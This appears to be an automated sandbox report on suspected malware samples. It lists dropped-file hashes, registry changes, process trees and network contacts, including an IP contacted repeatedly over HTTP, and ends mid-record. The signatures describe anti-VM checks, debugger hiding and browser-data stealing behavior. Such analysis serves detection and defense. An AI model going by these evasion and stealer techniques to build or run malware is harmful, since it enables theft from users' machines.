SHA1 39c3945c30abff65b372a7d8c691178ae9d9eee0
SHA256 2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e
SHA512 1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 1f6dc80ce5a84ef17e9779794b7df6e8
SHA1 5bb4d57eceb0088339010522d0085923b994a2f4
SHA256 403b6799de69adfc12508f5076adebb0bd3d8a61104550b1bcbd339ca63b8df2
SHA512 5adfaf13c99bd71ebca26e4f3da9ec03587be69bfe3b7487817640e3259b2b354f96786370e8419577ef5eb6a3a12c623345c98f8969e43cd8f0496d1b437d23

C:\Users\Admin\AppData\Local\Temp\heidi_K9P2oRtBlnq\caYoou6AkD688ohBorlb.exe

MD5 6521303e3666ae8ed8da817141810cc1
SHA1 7369d9bb8d156ea2a6ee134b7cd547913309806b
SHA256 7595acad6784cd13d6bd3fa41bf3087d66313ca9be5e1eab48f429c81ce5c2f1
SHA512 f4b58df7e5718053558fb848e0ae4d4a43468b71d929e4a856620170589cc9f55ffda257db2869fe2e7603d51a87516840654a96bfb84d2630188cd9c608d94d

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 92f9cb175991f582b8dfd0c5e3996110
SHA1 062df1e5e55706f4a99ab275a0e5ffc227356296
SHA256 7192a1241a20e08be3b1746bb93b5e2638e1beb748736c4d30c12d6b7d47a287
SHA512 4637a6faba71dd4a2f69c9acb77a64665e748d17d6933b7dd1be3db2eb862adc08a34415651ae0f93c37ad110322c0cb89f304f8310f704ef344b916ceb8b554

C:\Users\Admin\AppData\Local\Temp\CF74.exe

MD5 fa8e35d22c98e53b6366ebaeec28b6b6
SHA1 088e3ad63c39188ff30f8a3c2541293aa1d06df6
SHA256 2d68f91830a905f55f61d37e69cf925fb85396aa6fa4f5083e117f80a26efd57
SHA512 7b911df0087e51fb9f951d544e783e17bc193a4321466cd4d1b298416d2ba46dde457a6d5f75f586f3b4d645203960d9569235509b8207bcced6af803632dac4

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a89283832c07b98503d67fd3dfbf5166
SHA1 0e0025129052d951f61564496328f75f11e85249
SHA256 96d3c721915b0daa3d55ec2e85e32f7bd0453077d1344606015a6043d4136ea7
SHA512 01e649ec84a3ff7f87e6de62e261bd544a410fd8dcbb208bc963fc42235a03229bb619734f31309900b5f24c7242d28803a3e43212397d40a78d014361acb0df

C:\Users\Admin\AppData\Local\Temp\nsoCE67.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nsuDA1C.tmp

MD5 8ff53e80a706a7318fbea374d10d45a1
SHA1 3090f1b2c4e2925ec4c40e9c075c0e26b0e062d7
SHA256 a8ebc01ef33871d316ab99d917b940e8745c132a05e39ab117ca4b50583d24b4
SHA512 f1f597aae7f571307068b41d520ed0cf5beace1f2023fa1d5c2211a2eb28c88a059e3d17b1cfeae799cf843abf7adb83e7000bd9b336098b1b9e3caa6170f4a9

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

C:\Users\Admin\AppData\Local\Info Tool Extension\is-QQQ64.tmp

MD5 6231b452e676ade27ca0ceb3a3cf874a
SHA1 f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1
SHA256 9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf
SHA512 f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\nss3[1].dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\VSO Inspector\is-SJ36R.tmp

MD5 7c4c4a4d5684e8aacdc6b118a601a7bb
SHA1 64c8cc24339d73909916e303ab08a253dd49fe3f
SHA256 d20e213ef79f5f58cf6ca45812648e21612af6b82f52eeee044ea050ab32d75e
SHA512 db34326a59c7e5e809de1da9c98d5464d753dd554e9c8dddc32f164bfe9d637a5d5c6ae093905b8ca075b6801fd0d53e34e6400c7f9e1d553e33618a9baadeea

C:\Users\Admin\AppData\Local\VSO Inspector\is-9PEDE.tmp

MD5 9652fd87be092d9a50ef0156e00f8f8e
SHA1 006ab84afbd111eb8771276120a784c7a935e6c3
SHA256 456c82b7f6e36fe13fdd385579049c426b2fa1307b0180aa0496ca75d522324c
SHA512 5d7b963b0929c00a64a83c2ff235cafa4a98b45082d48ed2d0cf94cb4cd09fdfd0e94deae31ef85ed48bbf7660a39da71f97ed9124233bf448a2b2a76ea5c5d6

C:\Users\Admin\AppData\Local\Temp\305.exe

MD5 1996a23c7c764a77ccacf5808fec23b0
SHA1 5a7141b167056bf8f01c067ebe12ed4ccc608dc7
SHA256 e40c8e14e8cb8a0667026a35e6e281c7a8a02bdf7bc39b53cfe0605e29372888
SHA512 430c8b43c2cbb937d2528fa79c754be1a1b80c95c45c49dba323e3fe6097a7505fc437ddafab54b21d00fba9300b5fa36555535a6fa2eb656b5aa45ccf942e23

C:\ProgramData\EditPush.txt

MD5 a80739e8d257b131e2fb990d3a09bf4e
SHA1 3f2452672c160bb3eccfba3d612cfe95cfc64212
SHA256 b4449d67334535ca485a0245a341d6b9ce3315974bae7f6628aeaa78e14e4583
SHA512 9018a7e7dda66e4f59f42b7f260bd35a2f2165500abaff3cf2c99a40740c2ac4999b401aa1514a34d8dcaf91fa146f57d2de6342cc5036700544513e06a7ad63

C:\ProgramData\UndoSync.docx

MD5 2f04bfc62820734c1465af727c3f81d8
SHA1 b1de4ecafb64e259a0170f7ff418811629f08def
SHA256 d19f86b2d8656cf474f844476822ce8059ec41f29e7c6c9fa0fdb8ef1f7fe84b
SHA512 eddb3fbf823af8de9959090ebeaeb6d309d244ad494c71c9a9c657accdb6f96abcea1529689e79f8dfad0d755f9c62346f914f92cdd0c62ec363ce49d8ad549e

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Analysis: behavioral14

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win10v2004-20240221-en

Max time kernel

141s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3054445511-921769590-4013668107-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
N/A 224.0.0.251:5353 udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 45.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/2176-0-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-1-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-2-0x00007FFD80000000-0x00007FFD80002000-memory.dmp

memory/2176-3-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-4-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-5-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-7-0x00007FFD80030000-0x00007FFD80031000-memory.dmp

memory/2176-6-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp

memory/2176-8-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-9-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-10-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-11-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-12-0x0000000140000000-0x0000000140C54000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/2176-20-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-21-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-22-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-23-0x00007FFD80000000-0x00007FFD80002000-memory.dmp

memory/2176-24-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-25-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-26-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp

memory/2176-27-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-28-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-29-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-30-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-31-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-32-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-33-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-34-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-35-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-36-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-37-0x0000000140000000-0x0000000140C54000-memory.dmp

memory/2176-38-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp

memory/2176-39-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

115s

Max time network

168s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5008 wrote to memory of 4800 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 5008 wrote to memory of 4800 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 5008 wrote to memory of 4800 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

111s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"

Signatures

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
